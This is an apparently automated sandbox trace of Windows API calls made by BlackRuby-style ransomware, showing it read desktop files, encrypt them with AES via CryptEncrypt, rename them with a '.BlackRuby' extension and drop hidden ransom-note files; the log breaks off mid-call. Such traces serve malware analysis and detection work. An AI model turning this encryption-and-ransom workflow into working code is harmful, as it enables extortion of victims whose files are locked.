0x0 [0056.475] GetFileType (hFile=0x184) returned 0x1 [0056.475] SetErrorMode (uMode=0x0) returned 0x1 [0056.475] GetFileType (hFile=0x184) returned 0x1 [0056.475] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x3491 [0056.475] GetLastError () returned 0x0 [0056.475] ReadFile (in: hFile=0x184, lpBuffer=0x1ba9508, nNumberOfBytesToRead=0x3491, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ba9508*, lpNumberOfBytesRead=0x18ed84*=0x3491, lpOverlapped=0x0) returned 1 [0056.476] GetLastError () returned 0x0 [0056.476] CloseHandle (hObject=0x184) returned 1 [0056.476] GetLastError () returned 0x0 [0056.476] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", lpFilePart=0x0) returned 0x22 [0056.476] GetLastError () returned 0x0 [0056.476] SetErrorMode (uMode=0x1) returned 0x0 [0056.476] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi" (normalized: "c:\\users\\eebsym5\\desktop\\yatms.avi"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd523b0c0, ftCreationTime.dwHighDateTime=0x1d356e2, ftLastAccessTime.dwLowDateTime=0x16d1dbd0, ftLastAccessTime.dwHighDateTime=0x1d34f01, ftLastWriteTime.dwLowDateTime=0x16d1dbd0, ftLastWriteTime.dwHighDateTime=0x1d34f01, nFileSizeHigh=0x0, nFileSizeLow=0x3491)) returned 1 [0056.476] GetLastError () returned 0x0 [0056.476] SetErrorMode (uMode=0x0) returned 0x1 [0056.477] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0056.477] GetLastError () returned 0x0 [0056.518] CryptImportKey (in: hProv=0x37c680, pbData=0x1c0a1bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f20) returned 1 [0056.518] GetLastError () returned 0x0 [0056.518] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.518] GetLastError () returned 0x0 [0056.523] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.523] GetLastError () returned 0x0 [0056.523] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ee0) returned 1 [0056.523] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.523] GetLastError () returned 0x0 [0056.523] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1c37208*=0x1, dwFlags=0x0) returned 1 [0056.523] GetLastError () returned 0x0 [0056.523] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1c371d4, dwFlags=0x0) returned 1 [0056.523] GetLastError () returned 0x0 [0056.523] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c37250*, pdwDataLen=0x18ed74*=0x3590, dwBufLen=0x3590 | out: pbData=0x1c37250*, pdwDataLen=0x18ed74*=0x3590) returned 1 [0056.523] GetLastError () returned 0x0 [0056.523] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c3dd9c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c3dd9c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.523] GetLastError () returned 0x0 [0056.523] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c3ddcc*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c3ddcc*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.523] GetLastError () returned 0x0 [0056.523] CryptDestroyKey (hKey=0x360f20) returned 1 [0056.523] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.523] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.523] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", lpFilePart=0x0) returned 0x22 [0056.523] GetLastError () returned 0x0 [0056.524] SetErrorMode (uMode=0x1) returned 0x0 [0056.524] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi" (normalized: "c:\\users\\eebsym5\\desktop\\yatms.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.524] GetLastError () returned 0xb7 [0056.525] GetFileType (hFile=0x184) returned 0x1 [0056.525] SetErrorMode (uMode=0x0) returned 0x1 [0056.525] GetFileType (hFile=0x184) returned 0x1 [0056.526] CloseHandle (hObject=0x184) returned 1 [0056.526] GetLastError () returned 0xb7 [0056.526] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi", lpFilePart=0x0) returned 0x22 [0056.526] GetLastError () returned 0xb7 [0056.526] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_YeQwSS88Wz8XNhAODMtx1zykjbQAH7NTDiBBT.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_YeQwSS88Wz8XNhAODMtx1zykjbQAH7NTDiBBT.BlackRuby", lpFilePart=0x0) returned 0x52 [0056.526] GetLastError () returned 0xb7 [0056.526] SetErrorMode (uMode=0x1) returned 0x0 [0056.526] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi" (normalized: "c:\\users\\eebsym5\\desktop\\yatms.avi"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd523b0c0, ftCreationTime.dwHighDateTime=0x1d356e2, ftLastAccessTime.dwLowDateTime=0x16d1dbd0, ftLastAccessTime.dwHighDateTime=0x1d34f01, ftLastWriteTime.dwLowDateTime=0x29e34700, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x35a0)) returned 1 [0056.526] GetLastError () returned 0xb7 [0056.526] SetErrorMode (uMode=0x0) returned 0x1 [0056.526] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\YaTMs.avi" (normalized: "c:\\users\\eebsym5\\desktop\\yatms.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_YeQwSS88Wz8XNhAODMtx1zykjbQAH7NTDiBBT.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_yeqwss88wz8xnhaodmtx1zykjbqah7ntdibbt.blackruby")) returned 1 [0056.526] GetLastError () returned 0xb7 [0056.527] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.527] GetLastError () returned 0xb7 [0056.527] SetErrorMode (uMode=0x1) returned 0x0 [0056.527] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.527] GetLastError () returned 0x5 [0056.527] SetErrorMode (uMode=0x0) returned 0x1 [0056.527] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv", lpFilePart=0x0) returned 0x24 [0056.527] GetLastError () returned 0x5 [0056.528] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.528] GetLastError () returned 0x5 [0056.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0056.528] GetLastError () returned 0x5 [0056.528] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv", lpFilePart=0x0) returned 0x24 [0056.528] GetLastError () returned 0x5 [0056.528] SetErrorMode (uMode=0x1) returned 0x0 [0056.528] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f20 [0056.528] GetLastError () returned 0x5 [0056.528] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.528] GetLastError () returned 0x5 [0056.528] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.528] GetLastError () returned 0x5 [0056.528] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.528] GetLastError () returned 0x5 [0056.528] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.528] GetLastError () returned 0x5 [0056.528] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.528] GetLastError () returned 0x5 [0056.528] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.528] GetLastError () returned 0x5 [0056.528] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.528] GetLastError () returned 0x5 [0056.528] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0056.528] GetLastError () returned 0x12 [0056.528] FindClose (in: hFindFile=0x360f20 | out: hFindFile=0x360f20) returned 1 [0056.528] SetErrorMode (uMode=0x0) returned 0x1 [0056.528] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv", lpFilePart=0x0) returned 0x24 [0056.528] GetLastError () returned 0x12 [0056.528] SetErrorMode (uMode=0x1) returned 0x0 [0056.528] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f20 [0056.528] GetLastError () returned 0x12 [0056.529] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.529] GetLastError () returned 0x12 [0056.529] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.529] GetLastError () returned 0x12 [0056.529] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.529] GetLastError () returned 0x12 [0056.529] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.529] GetLastError () returned 0x12 [0056.529] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.529] GetLastError () returned 0x12 [0056.529] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.529] GetLastError () returned 0x12 [0056.529] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.529] GetLastError () returned 0x12 [0056.529] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0056.529] GetLastError () returned 0x12 [0056.529] FindClose (in: hFindFile=0x360f20 | out: hFindFile=0x360f20) returned 1 [0056.529] SetErrorMode (uMode=0x0) returned 0x1 [0056.529] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", lpFilePart=0x0) returned 0x39 [0056.529] GetLastError () returned 0x12 [0056.529] SetErrorMode (uMode=0x1) returned 0x0 [0056.529] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\3ccfswln52fldahv.csv"), fInfoLevelId=0x0, lpFileInformation=0x1c66a5c | out: lpFileInformation=0x1c66a5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aeac070, ftCreationTime.dwHighDateTime=0x1d34d6f, ftLastAccessTime.dwLowDateTime=0xdfc1e690, ftLastAccessTime.dwHighDateTime=0x1d353e1, ftLastWriteTime.dwLowDateTime=0xdfc1e690, ftLastWriteTime.dwHighDateTime=0x1d353e1, nFileSizeHigh=0x0, nFileSizeLow=0x11aae)) returned 1 [0056.529] GetLastError () returned 0x12 [0056.529] SetErrorMode (uMode=0x0) returned 0x1 [0056.529] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", lpFilePart=0x0) returned 0x39 [0056.529] GetLastError () returned 0x12 [0056.529] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", lpFilePart=0x0) returned 0x39 [0056.529] GetLastError () returned 0x12 [0056.529] SetErrorMode (uMode=0x1) returned 0x0 [0056.530] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\3ccfswln52fldahv.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.530] GetLastError () returned 0x0 [0056.530] GetFileType (hFile=0x184) returned 0x1 [0056.530] SetErrorMode (uMode=0x0) returned 0x1 [0056.530] GetFileType (hFile=0x184) returned 0x1 [0056.530] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x11aae [0056.530] GetLastError () returned 0x0 [0056.530] ReadFile (in: hFile=0x184, lpBuffer=0x1c68568, nNumberOfBytesToRead=0x11aae, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c68568*, lpNumberOfBytesRead=0x18ed18*=0x11aae, lpOverlapped=0x0) returned 1 [0056.531] GetLastError () returned 0x0 [0056.531] CloseHandle (hObject=0x184) returned 1 [0056.531] GetLastError () returned 0x0 [0056.531] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", lpFilePart=0x0) returned 0x39 [0056.531] GetLastError () returned 0x0 [0056.531] SetErrorMode (uMode=0x1) returned 0x0 [0056.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\3ccfswln52fldahv.csv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aeac070, ftCreationTime.dwHighDateTime=0x1d34d6f, ftLastAccessTime.dwLowDateTime=0xdfc1e690, ftLastAccessTime.dwHighDateTime=0x1d353e1, ftLastWriteTime.dwLowDateTime=0xdfc1e690, ftLastWriteTime.dwHighDateTime=0x1d353e1, nFileSizeHigh=0x0, nFileSizeLow=0x11aae)) returned 1 [0056.531] GetLastError () returned 0x0 [0056.531] SetErrorMode (uMode=0x0) returned 0x1 [0056.531] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0056.531] GetLastError () returned 0x0 [0056.566] CryptImportKey (in: hProv=0x37c708, pbData=0x1ce5e9c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360da0) returned 1 [0056.566] GetLastError () returned 0x0 [0056.566] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.566] GetLastError () returned 0x0 [0056.571] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.571] GetLastError () returned 0x0 [0056.571] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360d20) returned 1 [0056.571] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.571] GetLastError () returned 0x0 [0056.571] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1d12ee8*=0x1, dwFlags=0x0) returned 1 [0056.571] GetLastError () returned 0x0 [0056.571] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1d12eb4, dwFlags=0x0) returned 1 [0056.571] GetLastError () returned 0x0 [0056.571] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d12f30*, pdwDataLen=0x18ed08*=0x11ba0, dwBufLen=0x11ba0 | out: pbData=0x1d12f30*, pdwDataLen=0x18ed08*=0x11ba0) returned 1 [0056.572] GetLastError () returned 0x0 [0056.572] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d3669c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1d3669c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0056.572] GetLastError () returned 0x0 [0056.572] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d366cc*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1d366cc*, pdwDataLen=0x18ed28*=0x10) returned 1 [0056.572] GetLastError () returned 0x0 [0056.573] CryptDestroyKey (hKey=0x360da0) returned 1 [0056.573] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.573] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", lpFilePart=0x0) returned 0x39 [0056.573] GetLastError () returned 0x0 [0056.573] SetErrorMode (uMode=0x1) returned 0x0 [0056.573] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\3ccfswln52fldahv.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.574] GetLastError () returned 0xb7 [0056.574] GetFileType (hFile=0x184) returned 0x1 [0056.574] SetErrorMode (uMode=0x0) returned 0x1 [0056.574] GetFileType (hFile=0x184) returned 0x1 [0056.576] CloseHandle (hObject=0x184) returned 1 [0056.576] GetLastError () returned 0xb7 [0056.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv", lpFilePart=0x0) returned 0x39 [0056.576] GetLastError () returned 0xb7 [0056.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_3gsOWgjvkPJq0nWsH5HKSdyvGlTZ1MyoniuN.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_3gsOWgjvkPJq0nWsH5HKSdyvGlTZ1MyoniuN.BlackRuby", lpFilePart=0x0) returned 0x5d [0056.576] GetLastError () returned 0xb7 [0056.576] SetErrorMode (uMode=0x1) returned 0x0 [0056.576] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\3ccfswln52fldahv.csv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aeac070, ftCreationTime.dwHighDateTime=0x1d34d6f, ftLastAccessTime.dwLowDateTime=0xdfc1e690, ftLastAccessTime.dwHighDateTime=0x1d353e1, ftLastWriteTime.dwLowDateTime=0x29ea6b20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11bb0)) returned 1 [0056.576] GetLastError () returned 0xb7 [0056.576] SetErrorMode (uMode=0x0) returned 0x1 [0056.576] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\3cCFSwlN52fldAHV.csv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\3ccfswln52fldahv.csv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_3gsOWgjvkPJq0nWsH5HKSdyvGlTZ1MyoniuN.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\encrypted_3gsowgjvkpjq0nwsh5hksdyvgltz1myoniun.blackruby")) returned 1 [0056.577] GetLastError () returned 0xb7 [0056.581] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x3d [0056.581] GetLastError () returned 0xb7 [0056.581] SetErrorMode (uMode=0x1) returned 0x0 [0056.581] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.581] GetLastError () returned 0x0 [0056.581] GetFileType (hFile=0x184) returned 0x1 [0056.581] SetErrorMode (uMode=0x0) returned 0x1 [0056.581] GetFileType (hFile=0x184) returned 0x1 [0056.581] WriteFile (in: hFile=0x184, lpBuffer=0x1b5efa4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1b5efa4*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0056.582] GetLastError () returned 0x0 [0056.582] CloseHandle (hObject=0x184) returned 1 [0056.582] GetLastError () returned 0x0 [0056.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x3d [0056.582] GetLastError () returned 0x0 [0056.582] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0056.583] GetLastError () returned 0x0 [0056.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\4p39lK_O9k5oKQ.m4a", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\4p39lK_O9k5oKQ.m4a", lpFilePart=0x0) returned 0x37 [0056.583] GetLastError () returned 0x0 [0056.583] SetErrorMode (uMode=0x1) returned 0x0 [0056.583] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\4p39lK_O9k5oKQ.m4a" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\4p39lk_o9k5okq.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1b60c48 | out: lpFileInformation=0x1b60c48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca01b000, ftCreationTime.dwHighDateTime=0x1d35153, ftLastAccessTime.dwLowDateTime=0x36a31180, ftLastAccessTime.dwHighDateTime=0x1d35a01, ftLastWriteTime.dwLowDateTime=0x36a31180, ftLastWriteTime.dwHighDateTime=0x1d35a01, nFileSizeHigh=0x0, nFileSizeLow=0x5c5a)) returned 1 [0056.583] GetLastError () returned 0x0 [0056.583] SetErrorMode (uMode=0x0) returned 0x1 [0056.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x3d [0056.583] GetLastError () returned 0x0 [0056.583] SetErrorMode (uMode=0x1) returned 0x0 [0056.583] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.583] GetLastError () returned 0x5 [0056.585] SetErrorMode (uMode=0x0) returned 0x1 [0056.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", nBufferLength=0x105, lpBuffer=0x18e920, 